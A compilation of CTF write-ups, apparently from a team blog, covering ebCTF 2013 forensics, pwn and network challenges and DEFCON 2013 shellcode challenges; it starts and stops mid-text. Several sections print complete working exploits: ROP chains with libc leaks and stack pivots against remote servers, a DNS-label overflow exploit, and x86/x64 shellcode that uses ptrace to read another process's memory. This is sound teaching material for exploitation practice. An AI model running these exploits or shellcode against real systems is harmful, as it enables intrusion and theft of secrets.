rw- 0x0 0 0 0 1317 0x00007f7e9be23000 0x00007f7e9be25000 rw- 0x0 0 0 0 1317 0x00007f7e9be25000 0x00007f7e9be26000 r-- 0x22000 8 1 985 /lib/x86_64-linux-gnu/ld-2.15.so 1317 0x00007f7e9be26000 0x00007f7e9be28000 rw- 0x23000 8 1 985 /lib/x86_64-linux-gnu/ld-2.15.so 1317 0x00007fff39317000 0x00007fff39339000 rw- 0x0 0 0 0 [stack] 1317 0x00007fff393ff000 0x00007fff39400000 r-x 0x0 0 0 0
The python2 heap are on high addresses, and we should have some of the strings in it. So let’s dump all the address space and search in it.
$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_dump_map -p 1317 -D output/ $ grep -r 'i hide my' output/ Binary file output/task.1317.0x7f7e9bca2000.vma matches Binary file output/task.1317.0x7fff39317000.vma matches $ strings output/task.1317.0x7f7e9bca2000.vma | grep 'i hide my' i hide my is this where i hide my secrets? $ strings output/task.1317.0x7fff39317000.vma | grep 'i hide my' i hide my
As we can see that it should be
'secrets?'
. So we have the final modified python script :import sys import time import random import signal from Crypto.Cipher import AES key1 = "is this where" key2 = ' i hide my ' key3 = 'secrets?' iv = 'a very random iv' secret = './flag' mode = AES.MODE_CBC def encrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) inp = raw_input("Enter secret: ") diff = len(inp) % 16 if diff != 0: inp += ' ' * (16 - diff) with open(secret, 'wb') as outfile: outfile.write(enc.encrypt(inp)) del key, enc def decrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) with open(secret, 'rb') as infile: print(enc.decrypt(infile.read(48))) del key, enc print(decrypt(0, 0))
and the flag is :
$ python2 ctf.py ebctf{55169c1c241aa20412da94b3fcbf8506}
This challenge was interesting, thank you Eindbazen and NFI for these Forensics Challenges. We did not had the time to finish any other, but we will do them later. We hope to see more forensics challenges like that in future CTFs.
ebCTF 2013: PWN300
gopherd
is a linux elf32 gopher server which respond to simple requests:- a request just composed of
"\r\n"
will makegopherd
return its list of files, - a request
"MD5\r\n"
will make gopherd return the content of the file with the matching MD5.
Unfortunaly, the server replaces the contents of any file called
"FLAG"
by"ACCESS DENIED"
Step 1: The vuln
The vuln is in the function
ascii_to_bin
used to transform ascii MD5 to binary MD5. A simple buffer overflow can occur because the output buffer (in the caller stack frame) is too small to handle a big string.So by requesting a long string, we will be able to rewrite the return address of the caller function.
But there is another problem in
ascii_to_bin
function! The function logically uses two ascii chars to generate one bin char but iters overstrlen(input_string)
so it generates the good binary for the hash we send but also writelen(input_string)
garbage after, based on what comes afterinput_string
that we can’t control.So, if we just give
gopherd
a hash that will rewrite the return address of the caller: we will fill the caller args with garbage. So here is a part ofread_from_client
:We can see that, directly after the call to
ascii_to_bin
, the function callshashlist_find
withhaslist_addr
as first argument.hashlist_addr
is an argument of the caller that have been randomly rewritten byascii to bin
.So to pass the call function to
hashlist_find
,hashlist_addr
need to be a valid pointer with[ptr + 4] == 0
(becausehashlist_find
simply iters on the values in[ptr +4]
and zero will make it return immediately without any problem. An address from the beginning of.data
will be perfect.Step 2: the sploit
So, at this point, here is the format of our exploit string:
sploit = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + ret_addr + 'AAAAAAAA' + hashlist_addr
It seems that ROP would be a good idea here, so let’s start! The first thing to do is to set
ret_addr
at apop_pop_ret
address to removehashlist_addr
from the stack. After that, we will be in a totally controlled ROP environment.BUT: there is another problem! The length of the
read
that thegopherd
do is just 255 bytes long. And we know that:- each address is encoded on 8 bytes (addresses must be encoded in ascii for
ascii_to_bin
), - we consume 96 chars to trigger the vuln in a exploitable way.
So we can just use:
(255 - 96) / 8 = 19
values in our ROP payload: it won’t be enough to perform an"open/read/write"
payload.So we need to find a stack pivot!
RopMount
didn’t find a good stackpivot ingopherd
.But we know that ebCTF is using Ubuntu 12.04 LST: so let’s try in the libc!
$ python2 ropmount.py --dump "pop esp; ret" remote_libc.so.6 --- pop esp; ret: [base + 0x38b4] pop esp;ret ....
We have some nice and simple stack pivot in the remote libc!
So the attack will consist in 3 phases:
-
Step 1:
- ROP in
gopherd
to leak an address of the libc, - use this addr to build step 2 and 3.
- ROP in
-
Step 2:
- ROP to read stage 3 and put it in at a known location and pivot on it!
-
Step 3:
- full ROP with no length limitation,
-
I chose the following method:
- read the file name from the socket,
- open it,
- read it,
- send content to the socket!
Step 3: The full script
Here is the code used for each step with comments:
import socket import struct import sys import ropmount import time SERVERD= "54.217.15.93" PORTD=7070 REMOTE = SERVERD, PORTD LIBC = "./remote_libc.so.6" ###HELPERS def int_to_strformat(x): """transform a raw int to the good str for remote ascii_to_bin""" nb = hex(struct.unpack(">I", struct.pack("<I", x))[0])[2:] return "0" * (8 - len(nb)) + nb def ropchain_to_str(ropchain): """transform a ropchain to a good str to remote ascii_to_bin""" str_rop = "" for addr, size in ropchain.stack.dump(): str_rop += int_to_strformat(addr) return str_rop ###EXPLOIT ##STEP 1 #The address in DATA with [ptr + 4] == 0 hashlist_addr = int_to_strformat(0x0804C0C0) #We ROP on the gopherd binary rpc = ropmount.rop_from_files(["./gopherd"]) #Here is the pop_pop_ret to clean the stack before ROP pop_pop_ret = rpc.find("{2,2} pop REG32; ret") #The presumed FD of our socket socket_fd = 4 #Get the GOT addr of read read_plt = rpc.get_symbols()['read.got'].value #Build STEP1 ROP (write was not into gopherd PLT) #Just doing send(socket_fd, read_got_addr, 4, 0) ropchain = rpc.assemble("call send,{0},{1},4,0".format(socket_fd, read_plt)) #build the full exploit string for STEP1 sploit = ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' int_to_strformat(pop_pop_ret.vaddr.dump()[0]) + '42424242' + hashlist_addr + ropchain_to_str(ropchain)) #Send Step 1 and recv read addr in remote libc s = socket.create_connection(REMOTE) s.send(sploit + "\r\n") addr = s.recv(4) s.close() read_addr = struct.unpack("<I", addr)[0] ##STEP 2 #Now we ROP on gopherd AND the libc full_rpc = ropmount.rop_from_files(["./gopherd", LIBC]) #Get libc_base from leaked addr + read offset into libc libc_base = read_addr - full_rpc.mapfile[LIBC].get_symbols()['read'].value print("libc base : {0}".format(hex(libc_base))) #Tell to ropmount where is located remote libc to craft RopStack full_rpc.mapfile[LIBC].fix_baseaddr(libc_base) #Buffer used to store filename buff = 0x0804C0C0 #New stack location for the pivot new_stack = buff + 100 #Assemble STEP2 : # - read STEP3 into new_stack # - set esp to new_stack ropchain_load = full_rpc.assemble('call read,{1},{0},0x1000; set esp,{0}'.format(new_stack, socket_fd)) #Build the full exploit string for STEP2 sploit = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + int_to_strformat(pop_pop_ret.vaddr.dump()[0]) + '42424242' + hashlist_addr + ropchain_to_str(ropchain_load) #Send STEP2 s = socket.create_connection(REMOTE) s.send(sploit + "\r\n") time.sleep(1) #Now remote is waiting for STEP3 #STEP3 #The presumed socket of the newly opened file file_fd = socket_fd - 1 #Assemble STEP3 # - read filename from socket_fd into buff # - open file # - read file into into buff # - write buff into socket_fd last_rop = full_rpc.assemble("call read,{1},{0},50; call open,{0},4;call read,{2},{0},100; call write,{1},{0},100".format(buff, socket_fd, file_fd)) #We are not passing through ascii_to_bin anymore: raw binary ROP s.send(last_rop.stack.dump('raw')) time.sleep(1) #Now remote is waiting for filename s.send("./goproot/FLAG") #print content of filename print("------") print(s.recv(100))
Step 4: Launch
$ python2 client.py libc base : 0xf7617000 ------ 0h my g0d, I am defeat. Here, take this: ebCTF{35a6673b2243c925e02e85dfa916036f}
- a request just composed of
ebCTF 2013: Network challenges: NET100, NET200, NET300
NET100: index.php?-s: Post-attack network log analysis
OMG, Eindbazen got hacked. Can you figure out what this evil hacker did? http://ebctf.nl/files/da021f41e137fa42501586915d677752/net-100.pcap
For this first networking exercise, we will analyse network logs of an attack against Eindbazen to find what the attacker could do! We are given a clean pcap of the whole attack.
First thing we can notice, is a long UDP “stream” between the attacker and the target. Just before the attack, a POST was done on the web server hosted by the target. You can find the uploaded php script here. We didn’t spend too much time on it since it looked like a “command receiver on UDP”, which was enough information to continue analysing the logs.
Apart from the UDP stream, we could notice kerberos and ssh traffic, not that interesting, and a GET from the target to the attacker, of a file named
rootkit.zip
, quite interesting! We fetched the file but it was password protected. Let’s continue digging.Back at the UDP stream, we searched for commands related to rootkit.zip and found this interesting part of the stream where we can see the zip file being unzip’ed. Follows what looks like commands to send the password to unzip command, letter by letter:
alongpassword1234
.This password unlocked the zip file, in which we found a file flag.txt, containing “Instead of a rootkit we will just give you a flag:
ebCTF{b78dc61ce895a3856f3520e41c07b1be}
”.Done!
NET200: Who’s there
We found this strange website. http://54.216.81.14/
This website only contains:
112 + 386 + 712 + 1398 + 8771 + 11982 + 15397 + 23984 = 51037
After wondering a while what this addition was supposed to mean (especially since it was wrong and should give the result 62742), we noticed that all these numbers were in the valid port range. That’s when the semantic of this operation struck us: a collection of 8 ports giving a final port, this is exactly the principle of port-knocking.
The idea of this technique is to open a port only for a given client after he knockes to a pre-defined number of ports in the right order, which is only known by the server and the trusted users of the protected service.
So we can execute this first series with a simple netcat:
$ for port in 112 386 712 1398 8771 11982 15397 23984; do > netcat -v 54.216.81.14 $port > done netcat: unable to connect to address 54.216.81.14, service 112 netcat: unable to connect to address 54.216.81.14, service 386 [...] netcat: ec2-54-216-81-14.eu-west-1.compute.amazonaws.com (54.216.81.14) 51037 [51037] open So you are knocking me, how about I return the favor? Repeat after me and I will open the last port...
Is it knocking us back and expecting we mimic it? We can confirm that with
tcpdump
:# tcpdump -n -i eth0 'src host 54.216.81.14' 16:25:22.867635 IP 54.216.81.14.1337 > 163.5.55.17.8112: Flags [S], seq 0, win 8192, length 0 16:25:23.869346 IP 54.216.81.14.1337 > 163.5.55.17.33386: Flags [S], seq 0, win 8192, length 0 16:25:24.874334 IP 54.216.81.14.1337 > 163.5.55.17.14712: Flags [S], seq 0, win 8192, length 0 16:25:25.882108 IP 54.216.81.14.1337 > 163.5.55.17.4398: Flags [S], seq 0, win 8192, length 0 16:25:26.885593 IP 54.216.81.14.1337 > 163.5.55.17.1771: Flags [S], seq 0, win 8192, length 0 16:25:27.889869 IP 54.216.81.14.1337 > 163.5.55.17.52313: Flags [S], seq 0, win 8192, length 0 16:25:28.894443 IP 54.216.81.14.1337 > 163.5.55.17.25697: Flags [S], seq 0, win 8192, length 0 16:25:29.900296 IP 54.216.81.14.1337 > 163.5.55.17.932: Flags [S], seq 0, win 8192, length 0 16:25:30.905643 IP 54.216.81.14.1337 > 163.5.55.17.22222: Flags [S], seq 0, win 8192, length 0
OK, so let’s ping it on these exact same ports in that order. But this time, while the service was rejecting instantly all of our
SYN
TCP packets in the first series with aRST
, for this new series, it seems to drop half of the packets and to reject the other half withRST
. Thus, our previous super cool for-loop got stuck in the middle and caused the whole series to fail. So we just changed it to launch the netcat in background and it worked perfectly. This time the 22222 port replied with this message:[Advanced] sequence = 234,781,983,2411,9781,14954,23112,63991 seq_timeout = 15 command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT tcpflags = fin,urg,!ack cmd_timeout = 30 stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT
We recognized it was a chunk of configuration for the
knockd
daemon, which can be used to setup port-knocking on a UNIX host. It is easy to read, we just have to knock to another series of ports given by thesequence
option with the appropriate TCP flags, specified by thetcpflags
option, and we will be given access to the port 32154.This time, we could not use
netcat
because it does not allow us to specify arbitrary TCP flags, but, since we already had a script ready for the NET300 challenge using Scapy, we also used it for this new series:from scapy.all import * ports = [234,781,983,2411,9781,14954,23112,63991] for p in ports: print(send(IP(dst="54.216.81.14")/TCP(dport=p,flags="FU")))
And just connected normally to the final port which gave us the flag of this challenge:
$ netcat -v 54.216.81.14 32154 netcat: ec2-54-216-81-14.eu-west-1.compute.amazonaws.com (54.216.81.14) 32154 [32154] open ebCTF{32c64f2542ba4566acff750196ca2e13}
NET300: Hop on a plane!
We found this website which uses a location based access control system. Hop on a plane and hit all target zones! http://54.212.115.245/
What we understood was that this service tries to locate us by pinging our IP from three servers located in the US, in Brazil and in Japan and display our approximate location on the map. The goal is to make that location change by delaying the ping replies we send back to these three servers and make it hop in each of the three circles on the map.
A few of us tried to look for ways to do that using
iptables
or the traffic control in the kernel but it was impossible with the first one and it took them a long time with the second one.Meanwhile, we tried to use the
scapy
Python module to reply to the pings instead of the kernel. We first tried to prevent the kernel from answering, but dropping the ICMP packets withiptables
didn’t work, apparently because the answering part is lower thaniptables
in the network stack of the Linux kernel in order to make these replies fast. So we decided to disable these replies globally by enabling thenet.ipv4.icmp_echo_ignore_all
.Then, we wrote the Scapy script to respond to ping requests with fine adjustment of
time.sleep()
before our replies in function of which of the three servers we were replying. This script did work great but the results were really random due to network latency and probably our strange solution of replying to pings in userland. So now we had a plane that randomly wandered all over the map… ok great…We tried to adjust the
time.sleep
parameter but the result was just too random to be useful. Another problem was that the sleeps accumulated over our replies becausescapy
queues the requests so we were accumulating requests too much and, after a while, were answering with more than one minute of delay.So to fix these problems, we decided to modify the script to spawn threads for the replies, to avoid the accumulation of sleeps, so we could have big delay time (30 seconds or so) that would allow us to compensate the random network delay and finely tune the delays to reach exactly the appropriate locations. But we first modified the first script to make the delays totally random and launched it in background, just in case…
from scapy.all import * import time, random SRC = ["54.212.115.245", "54.232.216.98", "54.250.176.246"] def callback(pkt): if pkt[IP].proto == 1 and pkt[IP].src in SRC: if pkt[IP].src in SRC: time.sleep(random.randint(0,400)/1000.0) send(IP(dst=pkt[IP].src)/ICMP(type=0, id=0, seq=0)/Raw(load=pkt[Raw].load)) sniff(prn=callback, filter="(src host 54.212.115.245 or src host 54.232.216.98 or src host 54.250.176.246) and icmp", store=0)
And it worked, before we could finish the new script, the first one made us reach the three circles successfully, giving us the flag:
ebCTF{9bd26cbffa30c0ea32c425df220f06b9}
.EBCTF 2013: Clownstorage.net - dimwit - PWN 400
Score 400 Link http://ebctf.nl/files/8210c7065a7ac809297deec98f83e4f6/dimwit We found a strange binary that appears to be doing DNS queries for clownstorage.net, can you break in and gain access to the flag? The server is running on 54.217.6.47 port 50001
The binary is an ELF 64-bit, dynamically linked and not stripped. When first connecting to the address given we receive something like:
$ nc 54.217.6.47 ____ _ _____ ___ _ ____ _____ ___ ____ _ ____ _____ / ___| | / _ \ \ / / \ | / ___|_ _/ _ \| _ \ / \ / ___| ____| | | | | | | | \ \ /\ / /| \| \___ \ | || | | | |_) | / _ \| | _| _| | |___| |__| |_| |\ V V / | |\ |___) || || |_| | _ < / ___ \ |_| | |___ _ \____|_____\___/ \_/\_/ |_| \_|____/ |_| \___/|_| \_\/_/ \_\____|_____(_) _ _ _____ _____ | \ | | ____|_ _| | \| | _| | | | |\ | |___ | | |_| \_|_____| |_| Doritos Infrastructure Monitor Warning Information Techinology [INFO] resolving clownstorage.net [INFO] binding socket [WARNING] binding to port 53 failed, trying 6140 instead [INFO] socket bound [TEST_FAILED] dns timeout
Because the binary was not stripped, it was quite easy to understand what it does. It first checks that the file
flag
exists, then it opens a connection on the port 50001, accepts and forks.When a connection is received, it does a
dup2
between the standard output and the socket file descriptor. Then it calls a function namedread_motd
which takes the name of a file, reads it, writes it to the standard output, and finally calls the functiondo_nameserver_test
.The function
do_nameserver_test
tries to create anudp_socket
, first on the port 53 (which fails each time) and then on a random port. Thankfully, we have a warning telling us on which port it is bound. When the socket is created it sends a DNS request, then setups a handler for the signalSIGALARM
which prints:"[TEST_FAILED] dns timeout"
and exits. It then enters in the loop:while (!query_received) // query_received is a global variable initialize to 0 { alarm(5); // if in 5s we have not finish launch a SIGALARM receive_dns(fd); // the name is explicit } puts("[TEST_OK] nameserver up"); fflush(stdin);
Because the alarm is quite anoying if you want to debug, I personally nop it to avoid problems when debugging.
Now we have a global overview of what our programm does, the goal will be to exploit the function
receive_dns
in order to gain code execution. Here is the begin of the code to get the first information:import socket import struct #PROFILE = 'local' PROFILE = 'remote' if PROFILE == 'local': HOST = 'localhost' elif PROFILE == 'remote': HOST = '54.217.6.47' PORT = 50001 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _recv_tcp(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r _recv_tcp(' ____ _ _____ ___ _ ____ _____ ___ ____ _ ____ _____ \n / ___| | / _ \\ \\ / / \\ | / ___|_ _/ _ \\| _ \\ / \\ / ___| ____| \n| | | | | | | \\ \\ /\\ / /| \\| \\___ \\ | || | | | |_) | / _ \\| | _| _| \n| |___| |__| |_| |\\ V V / | |\\ |___) || || |_| | _ < / ___ \\ |_| | |___ _ \n \\____|_____\\___/ \\_/\\_/ |_| \\_|____/ |_| \\___/|_| \\_\\/_/ \\_\\____|_____(_)\n \n _ _ _____ _____ \n| \\ | | ____|_ _|\n| \\| | _| | | \n| |\\ | |___ | | \n|_| \\_|_____| |_| \n\nDoritos Infrastructure Monitor Warning Information Techinology\n\n') _recv_tcp('[INFO] resolving clownstorage.net\n') _recv_tcp('[INFO] binding socket\n') r = _recv_tcp('[WARNING] binding to port 53 failed, trying 33501 instead\n') _recv_tcp('[INFO] socket bound') UDP_PORT = int(r.split()[7]) print("UDP_PORT = ", UDP_PORT)
So now lets get a look into
receive_dns
.The function receives a size of 0x200 and puts it in a buffer of the same size. It then begins to check if the received data is correct. The DNS header looks like this:
The program do some checks, first on the flags, then it checks the ID. Passing the test on the different flags is not hard, but we have a problem with the ID. We don’t know which ID is use because we don’t get the request that the program sends. But, it is on 16 bits, so we can simply bruteforce it by sending our data with all the possible IDs.
The function then does a loop for skipping the requests that may be contained in the answer: it iterates for the number in the
"qdcount"
and reads the size of eachlabelname
(using the functionlabelname_len
) and skip them. We have no interest in this part: we can just putqdcount
to 0. It will then loop on the answer for"ancount"
time, copy the label and check if he has a valid answer and then returns. The following code sends the answer to the program:def _send_udp(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return sock.sendto(st, (HOST, UDP_PORT)) # here we will put flag to 0b0000000010000000 and qdcount to 0 def _send_dns(flag, qdcount, ancount, msg, end): FLAG = struct.pack("<H", flag) QDCOUNT = struct.pack("<H", qdcount) ANCOUNT = struct.pack("<H", ancount) NSCOUNT = struct.pack("<H", 0) ARCOUNT = struct.pack("<H", 0) for i in range(65536): ID = struct.pack("<H", i) _send_udp(ID + FLAG + QDCOUNT + ANCOUNT + NSCOUNT + ARCOUNT + msg + end)
A label in the DNS protocol is defined as different parts: it begins by a size (which, in this implementation, should be inferior to 0x3f) and then followed by the characters. The vulnerability is in the
copy_from_labelname
function:void copy_from_labelname(char *dst, char *src, int pos, int max) { int i = 0; int t; while (src[pos] != 0) { if (pos >= max) { puts('[ABORTING] truncated packet'); fflush(stdout); abort(); } if (src[pos] < 0x3f) { if (src[pos] + pos + 1 > max) { puts('[ABORTING] truncated packet'); fflush(stdout); abort(); } memcpy(dst + i, src + pos + i, src[pos]); i += src[pos]; dst[i] = '.'; i++; pos += src[pos]; } else if (src[pos] <= 0xbf) { puts('[ABORTING] bad packet'); fflush(stdout); abort(); } else { // HERE is a particular case where is the vuln t = ror(((short *)src)[pos / 2], 8) & 0x3fff; if (max - 1 > pos && t < max && t < pos) pos = t; else { puts('[ABORTING] ...'); fflush(stdout); abort(); } } } dst[i] = 0; }
The parameter
max
given to this function is the size returned by therecv
function, thedst
buffer is a buffer of size 0x200. This function seems to be valid because, like the destination buffer, it is the same size as the buffersrc
, so we can not override it. The problem is in the else of the function: we can reset the position and then write more in the destination buffer, this will allow us to trigger a buffer overflow and then to rop.Once we have our buffer overflow, the ROP is quite simple: we will call the function
read_motd
, this takes one argument: the address of the string"flag"
, which is already in the binary. Because we are in x86_64, we will need one gadget to put the address of the string"flag"
in therdi
register.The gadget I use is simple:
mov edi, dword [rsp+0x30] add rsp, 0x38 ret
I used the tools developped by 0vercl0k (https://github.com/0vercl0k/rp) for finding this gadget.
Here is the final part of the exploit:
# this will serv for the padding bytesa = b'\x3e' + 0x3e*b'a' bytesc = b'\x38' + 0x38*b'c' # here we exploit the problem of the function retu = b'\x33' + b'\x34' + b'\x35' + b'\x36' + b'\x37' + b'\x38' + b'\x39' + 0x2d*b'a' + b'\xc0\x0d' + b'\xc0\x0e' + b'\xc0\x0f' + b'\xc0\x10' + b'\xc0\x11' + b'\xc0\x12' #\xc0 permet to be in the particular case, the second element permet to say # the position in the buffer where we will set the pos. ADDR_READ_MOTD = struct.pack("<Q", 0x401360) # the address of the function ADDR_FLAG = struct.pack("<Q", 0x40183b) # the address of the string ADDR_PIVOT = struct.pack("<Q", 0x401500) # the address of the gadget PADD = retu + 2 * bytesa + bytesc # just some padding # the 8*b'a' are the padding because of the add rsp, 0x38 SEND1 = PADD + b'\x28' + ADDR_PIVOT + 8*b'a' + 8*b'a' + 8*b'a' + 8*b'a' SEND2 = b'\x38' + 7*b'a'+ 8*b'a' + ADDR_FLAG + ADDR_READ_MOTD + 0x19*b'x' + b'\x00' SEND = SEND1 + SEND2 _send_dns(0b0000000010000000, 0, 1, SEND, b"a") # Here we recv the answer _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024)
Here is the complete exploit:
import socket import struct #PROFILE = 'local' PROFILE = 'remote' if PROFILE == 'local': HOST = 'localhost' elif PROFILE == 'remote': HOST = '54.217.6.47' PORT = 50001 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _send_udp(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return sock.sendto(st, (HOST, UDP_PORT)) def _recv_tcp(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r def _send_dns(flag, qdcount, ancount, msg, end): FLAG = struct.pack("<H", flag) QDCOUNT = struct.pack("<H", qdcount) ANCOUNT = struct.pack("<H", ancount) NSCOUNT = struct.pack("<H", 0) ARCOUNT = struct.pack("<H", 0) for i in range(65536): ID = struct.pack("<H", i) _send_udp(ID + FLAG + QDCOUNT + ANCOUNT + NSCOUNT + ARCOUNT + msg + end) _recv_tcp(' ____ _ _____ ___ _ ____ _____ ___ ____ _ ____ _____ \n / ___| | / _ \\ \\ / / \\ | / ___|_ _/ _ \\| _ \\ / \\ / ___| ____| \n| | | | | | | \\ \\ /\\ / /| \\| \\___ \\ | || | | | |_) | / _ \\| | _| _| \n| |___| |__| |_| |\\ V V / | |\\ |___) || || |_| | _ < / ___ \\ |_| | |___ _ \n \\____|_____\\___/ \\_/\\_/ |_| \\_|____/ |_| \\___/|_| \\_\\/_/ \\_\\____|_____(_)\n \n _ _ _____ _____ \n| \\ | | ____|_ _|\n| \\| | _| | | \n| |\\ | |___ | | \n|_| \\_|_____| |_| \n\nDoritos Infrastructure Monitor Warning Information Techinology\n\n') _recv_tcp('[INFO] resolving clownstorage.net\n') _recv_tcp('[INFO] binding socket\n') r = _recv_tcp('[WARNING] binding to port 53 failed, trying 33501 instead\n') _recv_tcp('[INFO] socket bound') UDP_PORT = int(r.split()[7]) print("UDP_PORT = ", UDP_PORT) bytesa = b'\x3e' + 0x3e*b'a' bytesb = b'\x33' + 0x33*b'b' bytesc = b'\x38' + 0x38*b'c' pading = b'\x0b' + 0xb*b'a' retu = b'\x33' + b'\x34' + b'\x35' + b'\x36' + b'\x37' + b'\x38' + b'\x39' + 0x2d*b'a' + b'\xc0\x0d' + b'\xc0\x0e' + b'\xc0\x0f' + b'\xc0\x10' + b'\xc0\x11' + b'\xc0\x12' ADDR_READ_MOTD = struct.pack("<Q", 0x401360) ADDR_FLAG = struct.pack("<Q", 0x40183b) ADDR_PIVOT = struct.pack("<Q", 0x401500) PADD = retu + 2 * bytesa + bytesc SEND1 = PADD + b'\x28' + ADDR_PIVOT + 8*b'a' + 8*b'a' + 8*b'a' + 8*b'a' SEND2 = b'\x38' + 7*b'a'+ 8*b'a' + ADDR_FLAG + ADDR_READ_MOTD + 0x19*b'a' + b'\x00' SEND = SEND1 + SEND2 _send_dns(0b0000000010000000, 0, 1, SEND, b"a") _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024)
The flag was:
ebctf{c0fa2ef42705a3092cbec827e1777cd5}
.DEFCON 2013 Quals: Linked - Shellcode (ÿäÌ) 3
Score 3 Link http://assets.shallweplayaga.me/linked.txt
This challenge was very simple in itself and didn’t involve reversing a binary or finding a vulnerability :
typedef struct _llist { struct _llist *next; uint32_t tag; char data[100]; llist; and: register char *answer; char *(*func)(); llist *head; ... func = (char *(*)(llist *))userBuf; answer = (char *)(*func)(head); send_string(answer); exit(0); Write me shellcode that traverses the randomly generated linked list, looking for a node with a tag 0x41414100, and returns a pointer to the data associated with that tag, such that the call to send_string will output the answer.
We began connecting to the server and experimenting a few things in order to determine the architecture, maximum length and other information required to write this shellcode.
The service clearly advised that the maximum length was 16 bytes when one sent a longer packet. We quickly narrowed the architecture to bare x86, and, if we thought the shellcode had to be NULL-free at first, we quickly discovered that it needn’t.
So we gave it a first shot, using a few tricks in order to use the lowest number of bytes, but could not squeeze it to less than this shellcode which is 20 bytes-long :
pop edx ; return address pop ebx ; linked-list head push 0x41414100 pop edi myloop: mov ebx, [ebx] cmp [ebx + 4], edi jnz myloop lea eax, [ebx + 8] ; mov eax, ebx + 8 jmp edx
So we began experimenting with shellcodes that did not fully respect the subject but could get us a close-enough result to retrieve the flag. We first tried to test that the second lowest byte was 0x41, but this was not restrictive enough to get the flag, so we tried matching 0x4100.
To do that in less than 16 bytes, we had to replace our two first pops by a popa which is only 1 byte-long but may totally destroy the stack frame. But since the function that calls our shellcode never returns, as shown in the subject, we don’t really care.
The final result is:
popa ; edi = return addr, esi = linked-list head myloop: mov esi, [esi] cmp word [esi + 4], 0x4100 jnz myloop lea eax, [esi + 8] jmp edi
And we were quite surprised that it worked on the first try. One funny thing to note is that the key it gave us was:
The key is: Who says ESP isn't general purpose!?!?
Hmm, I guess our solution was not the intended one…
For reference, the intended solution, given by an organizer (gynophage) at the end of the CTF was:
mov eax,0x41414100 pop ebx pop ebp leave mov edi,esp scasd jnz 0x7 xchg eax,edi call ebx
DEFCON 2013 Quals: Incest - Shellcode (ÿäÌ) 1
Score 1 I hear banjos. incest.shallweplayaga.me:65535 http://assets-2013.legitbs.net/liabilities/maw http://assets-2013.legitbs.net/liabilities/sis
As the title might suggest, this challenge involves children creation and family betrayal. The two given binaries are ELF64.
The first binary,
maw
, accepts connections from the users and do the classicaccept
andfork
for each of those. Then, it opens the key file in read only and executes (viaexecl
) the second binary,sis
. We can already notice that the file descriptor for the key file will also be available in the childrensis
, as well as the socket of the client, the number of these two file descriptors being passed on the command-line.This second program forks after parsing these arguments and setting-up a couple of signals and alarms. The parent closes the client’s socket file descriptor, allocates a buffer on the heap (via
calloc
) and reads the content of the key file to this buffer. The child maps a new page,recv
0x200 bytes from the socket to this page and directly call this page. The two new processes then wait in an infinite loop and end-up killed by aSIGALARM
set-up at the start of thesis
program.In a first time, what we can retain from all this is that we only have to send the raw bytes of a shellcode and it will be directly executed without any trouble or restriction other than being limited to 0x200 bytes, if we call that a restriction…
So we began by writing a simple 3 ×
dup2
andexecve(bash)
which allowed us to browse the server and get a few pieces of information about the environment. This allowed us to notice that the key file was only readable bymaw
, which dropped its privileges before executingsis
. It was thus impossible to read the key from the shell we had.This convinced us that the only way to read the key was to read the memory of the
sis
parent process (remember:sis
forks and the shellcode is executed in the child) from the child, because it reads the key in a buffer and simply waits 15 seconds before exiting.We tried to make gdb read the parent memory from the shell we had, but could not get it working, contrary to other teams, as we discovered at the end of the CTF. So we built a shellcode that manipulate
ptrace
to read the key from the parent process.It was pretty straightforward to write, it simply:
- gets the PID of the parent,
- attaches to this parent,
- waits for the parent,
- gets the
rbp
of the parent, which is useless because this should be the same for both process, but we used this to debug our shellcode so we kept it, - finds the address of the allocated buffer,
- sends the content of this buffer over the socket.
However we got stuck at this point with all our
PTRACE_PEEKTEXT
failing. We had used the manpage ofptrace(2)
to fill the ptrace syscall arguments, but this manpage actually documents the ptrace wrapper in the glibc, which, for some reason, does not use the same arguments as the Linux syscall. We lost a lot of time on this stupid mistake.Anyway, here is the final working shellcode :
```nasm ; getppid xor rax, rax mov al, 0x6e syscall mov r14, rax
; ptrace_attach mov rdi, 0x10 mov rsi, r14 xor rax, rax mov al, 0x65 syscall
; wait() xor rdi, rdi dec rdi xor rsi, rsi xor rdx, rdx xor rcx, rcx xor rax, rax mov al, 61 syscall
; ptrace_getregs mov rdi, 0xc mov rsi, r14 xor rdx, rdx mov r10, rsp xor rdx, rdx xor rax, rax mov al, 0x65 syscall xor r10, r10
mov r12, [rsp + 4*8] ; get the parent rbp add r12, -0x18 ; r12 = location of the wanted buffer
; ptrace_peektext : get the address of the buffer mov rdi, 0x1 mov rsi, r14 mov rdx, r12 mov r10, rsp xor rax, rax mov al, 0x65 syscall
; from r12 to r13 = (r12 + 0x80) mov r12, [rsp] mov r13, r12 ; to r13 add r13, 0x80
loop: ; ptrace_peektext mov rdi, 0x1 mov rsi, r14 mov rdx, r12 mov r10, rsp xor rax, rax mov al, 0x65 syscall
; write rax mov rax, [rsp] push rax push rsp pop rsi ; buf mov rdi, 0x4 ; fd mov rdx, 0x8 ; len xor rax, rax inc rax syscall pop rax
